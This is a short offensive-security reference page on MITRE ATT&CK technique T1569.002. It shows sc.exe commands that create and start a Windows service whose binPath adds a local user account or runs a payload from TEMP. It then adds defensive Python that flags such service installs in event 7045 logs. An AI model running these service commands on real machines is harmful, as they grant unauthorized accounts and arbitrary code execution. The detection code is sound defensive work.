MITRE ATT&CK™ System Services - Service Execution - Technique T1569.002
Theory
Windows services can also be leveraged to run arbitrary commands: when a service is started, the Service Control Manager executes whatever command is configured as its binary path (binPath).
Practice
On Windows, we can use the built-in sc.exe binary to remotely interact with services.
#Create a service
sc.exe create MyService binPath= "net user munra Pass123 /add" start= auto
sc.exe create MyService binPath= "C:\Windows\TEMP\payload.exe" start= auto
#Start a service
sc.exe start MyService
#Stop and delete a remote service
sc.exe stop MyService
sc.exe delete MyService
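For the defender's view of the commands above, the following Python is an added example (not part of the original page): the Service Control Manager logs each new service as event 7045 in the System log, with the binPath value recorded as ImagePath, and this code triages such events. The event dictionaries are constructed samples that reuse the page's two binPath values, and the rule lists and function names are assumptions to tune for your environment.

```python
import re
from pathlib import PureWindowsPath

# Assumed rule lists for this example; tune them for your environment.
WRITABLE_DIRS = ("\\temp\\", "\\appdata\\", "\\users\\public\\")
UTILITIES = {"cmd", "powershell", "pwsh", "net", "net1", "rundll32",
             "regsvr32", "mshta", "wscript", "cscript"}

def image_executable(image_path):
    """Return the program part of a service ImagePath (quoted or bare)."""
    p = image_path.strip()
    if p.startswith('"'):
        return p[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.exe)(\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else (p.split() or [""])[0]

def review_service_install(event):
    """Return the reasons a 7045 'service installed' event needs triage."""
    if event.get("EventID") != 7045:
        return []
    exe = image_executable(event.get("ImagePath", ""))
    reasons = []
    if any(d in exe.lower() for d in WRITABLE_DIRS):
        reasons.append("binary in a user-writable directory")
    if PureWindowsPath(exe).stem.lower() in UTILITIES:
        reasons.append("ImagePath runs a command-line utility")
    return reasons

# Constructed sample events (field names follow event 7045).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "MyService",
     "ImagePath": "net user munra Pass123 /add"},
    {"EventID": 7045, "ServiceName": "MyService",
     "ImagePath": r"C:\Windows\TEMP\payload.exe"},
    {"EventID": 7045, "ServiceName": "VendorAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service'},
    {"EventID": 7036, "ServiceName": "Spooler"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for reason in review_service_install(ev):
            print(f'{ev["ServiceName"]}: {reason} ({ev["ImagePath"]})')
```

A service whose ImagePath is a one-shot command also fails to report to the Service Control Manager after it starts, so a 7045 hit paired with a service start failure for the same service name is a stronger signal than either alone.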
You may want to check this page for remote service execution: